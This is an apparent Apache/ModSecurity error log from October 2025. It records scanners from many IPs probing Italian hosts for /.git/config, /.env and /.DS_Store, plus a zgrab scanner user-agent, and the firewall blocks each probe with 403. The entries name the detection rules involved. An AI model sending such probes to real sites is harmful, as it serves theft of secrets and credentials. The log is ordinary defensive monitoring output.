[Thu Oct 09 21:12:22.402667 2025] [:error] [pid 3358693] [client 172.235.183.127:49914] [client 172.235.183.127] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOgJFjAxZ17-YIO-YAoGIQAAAAI"]
[Thu Oct 09 21:12:22.402841 2025] [:error] [pid 3358693] [client 172.235.183.127:49914] [client 172.235.183.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOgJFjAxZ17-YIO-YAoGIQAAAAI"]
[Thu Oct 09 21:12:22.402992 2025] [:error] [pid 3358693] [client 172.235.183.127:49914] [client 172.235.183.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOgJFjAxZ17-YIO-YAoGIQAAAAI"]
[Fri Oct 10 00:04:12.494526 2025] [:error] [pid 3364337] [client 197.244.69.51:62363] [client 197.244.69.51] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOgxXKRuIgTrjo6j8W2WgAAAAA4"]
[Fri Oct 10 00:04:12.497237 2025] [:error] [pid 3364337] [client 197.244.69.51:62363] [client 197.244.69.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOgxXKRuIgTrjo6j8W2WgAAAAA4"]
[Fri Oct 10 00:04:12.497423 2025] [:error] [pid 3364337] [client 197.244.69.51:62363] [client 197.244.69.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOgxXKRuIgTrjo6j8W2WgAAAAA4"]
[Sat Oct 11 00:06:51.160239 2025] [:error] [pid 3390474] [client 195.178.110.130:39610] [client 195.178.110.130] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOmDe0rLsNZdUocAdRl-ngAAABo"]
[Sat Oct 11 00:06:51.160583 2025] [:error] [pid 3390474] [client 195.178.110.130:39610] [client 195.178.110.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOmDe0rLsNZdUocAdRl-ngAAABo"]
[Sat Oct 11 00:06:51.160763 2025] [:error] [pid 3390474] [client 195.178.110.130:39610] [client 195.178.110.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOmDe0rLsNZdUocAdRl-ngAAABo"]
[Sun Oct 12 14:21:56.749858 2025] [:error] [pid 3428273] [client 213.209.157.253:36550] [client 213.209.157.253] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOudZJwj_kDkrovqZoPM-AAAAAY"]
[Sun Oct 12 14:21:56.750145 2025] [:error] [pid 3428273] [client 213.209.157.253:36550] [client 213.209.157.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOudZJwj_kDkrovqZoPM-AAAAAY"]
[Sun Oct 12 14:21:56.750304 2025] [:error] [pid 3428273] [client 213.209.157.253:36550] [client 213.209.157.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aOudZJwj_kDkrovqZoPM-AAAAAY"]
[Mon Oct 13 03:50:23.459901 2025] [:error] [pid 3441883] [client 176.65.149.195:32914] [client 176.65.149.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOxa39PjQ1hNz-U16nWeAwAAAAA"]
[Mon Oct 13 03:50:23.461928 2025] [:error] [pid 3441883] [client 176.65.149.195:32914] [client 176.65.149.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOxa39PjQ1hNz-U16nWeAwAAAAA"]
[Mon Oct 13 03:50:23.462108 2025] [:error] [pid 3441883] [client 176.65.149.195:32914] [client 176.65.149.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOxa39PjQ1hNz-U16nWeAwAAAAA"]
[Mon Oct 13 03:57:07.559515 2025] [:error] [pid 3441887] [client 176.65.149.195:33250] [client 176.65.149.195] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aOxcc5ZH-D1cpXrlabGoKAAAAAQ"]
[Mon Oct 13 03:57:07.559794 2025] [:error] [pid 3441887] [client 176.65.149.195:33250] [client 176.65.149.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aOxcc5ZH-D1cpXrlabGoKAAAAAQ"]
[Mon Oct 13 03:57:07.559954 2025] [:error] [pid 3441887] [client 176.65.149.195:33250] [client 176.65.149.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aOxcc5ZH-D1cpXrlabGoKAAAAAQ"]
[Tue Oct 14 11:04:23.668883 2025] [:error] [pid 3470180] [client 192.227.138.144:17302] [client 192.227.138.144] ModSecurity: Warning. Pattern match "\\\\b(?:keep-alive|close),\\\\s?(?:keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "311"] [id "920210"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aO4SF_YaeEpVxFj1-k5ayAAAAAY"], referer: https://www.google.com
[Wed Oct 15 09:25:55.750881 2025] [:error] [pid 3493340] [client 46.8.228.54:57020] [client 46.8.228.54] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aO9Mg97B6UBj0ESc361LTgAAAAs"]
[Wed Oct 15 09:25:55.751207 2025] [:error] [pid 3493340] [client 46.8.228.54:57020] [client 46.8.228.54] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aO9Mg97B6UBj0ESc361LTgAAAAs"]
[Wed Oct 15 09:25:55.751369 2025] [:error] [pid 3493340] [client 46.8.228.54:57020] [client 46.8.228.54] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aO9Mg97B6UBj0ESc361LTgAAAAs"]
[Wed Oct 15 10:00:02.963037 2025] [:error] [pid 3499599] [client 185.177.72.11:41776] [client 185.177.72.11] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aO9Uguz4BxZjphQf-0SloAAAAAQ"]
[Wed Oct 15 10:00:02.963382 2025] [:error] [pid 3499599] [client 185.177.72.11:41776] [client 185.177.72.11] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aO9Uguz4BxZjphQf-0SloAAAAAQ"]
[Wed Oct 15 10:00:02.963581 2025] [:error] [pid 3499599] [client 185.177.72.11:41776] [client 185.177.72.11] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aO9Uguz4BxZjphQf-0SloAAAAAQ"]
[Sat Oct 18 06:35:45.573196 2025] [:error] [pid 3571055] [client 3.146.111.124:57472] [client 3.146.111.124] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aPMZIXrl7maVumneuomjYAAAAAk"]
[Sat Oct 18 06:35:45.573679 2025] [:error] [pid 3571055] [client 3.146.111.124:57472] [client 3.146.111.124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aPMZIXrl7maVumneuomjYAAAAAk"]
[Sat Oct 18 06:35:45.573876 2025] [:error] [pid 3571055] [client 3.146.111.124:57472] [client 3.146.111.124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aPMZIXrl7maVumneuomjYAAAAAk"]
[Sun Oct 19 05:22:37.353238 2025] [:error] [pid 3593369] [client 195.178.110.223:56462] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPRZfT8n9FH-XIEruGmZAAAAAAM"]
[Sun Oct 19 05:22:37.355990 2025] [:error] [pid 3593369] [client 195.178.110.223:56462] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPRZfT8n9FH-XIEruGmZAAAAAAM"]
[Sun Oct 19 05:22:37.356149 2025] [:error] [pid 3593369] [client 195.178.110.223:56462] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPRZfT8n9FH-XIEruGmZAAAAAAM"]
[Mon Oct 20 13:52:30.591178 2025] [:error] [pid 3620411] [client 174.138.87.38:35260] [client 174.138.87.38] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPYifhFmAaYxR27eR1GTYwAAAAY"]
[Mon Oct 20 13:52:30.592624 2025] [:error] [pid 3620411] [client 174.138.87.38:35260] [client 174.138.87.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPYifhFmAaYxR27eR1GTYwAAAAY"]
[Mon Oct 20 13:52:30.592827 2025] [:error] [pid 3620411] [client 174.138.87.38:35260] [client 174.138.87.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPYifhFmAaYxR27eR1GTYwAAAAY"]
[Tue Oct 21 15:07:28.509351 2025] [:error] [pid 3644002] [client 91.92.241.199:54069] [client 91.92.241.199] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPeFkOIJIHUrmPDzrnW-WQAAAAk"]
[Tue Oct 21 15:07:28.511271 2025] [:error] [pid 3644002] [client 91.92.241.199:54069] [client 91.92.241.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPeFkOIJIHUrmPDzrnW-WQAAAAk"]
[Tue Oct 21 15:07:28.511463 2025] [:error] [pid 3644002] [client 91.92.241.199:54069] [client 91.92.241.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPeFkOIJIHUrmPDzrnW-WQAAAAk"]
[Wed Oct 22 14:37:25.800957 2025] [authz_core:error] [pid 3678871] [client 206.81.24.74:58118] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Oct 22 14:37:27.117592 2025] [:error] [pid 3668489] [client 206.81.24.74:51254] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPjQB-XOXMfSv8NMtrFiDQAAAAM"]
[Wed Oct 22 14:37:27.117800 2025] [:error] [pid 3668489] [client 206.81.24.74:51254] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPjQB-XOXMfSv8NMtrFiDQAAAAM"]
[Wed Oct 22 14:37:27.117948 2025] [:error] [pid 3668489] [client 206.81.24.74:51254] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aPjQB-XOXMfSv8NMtrFiDQAAAAM"]
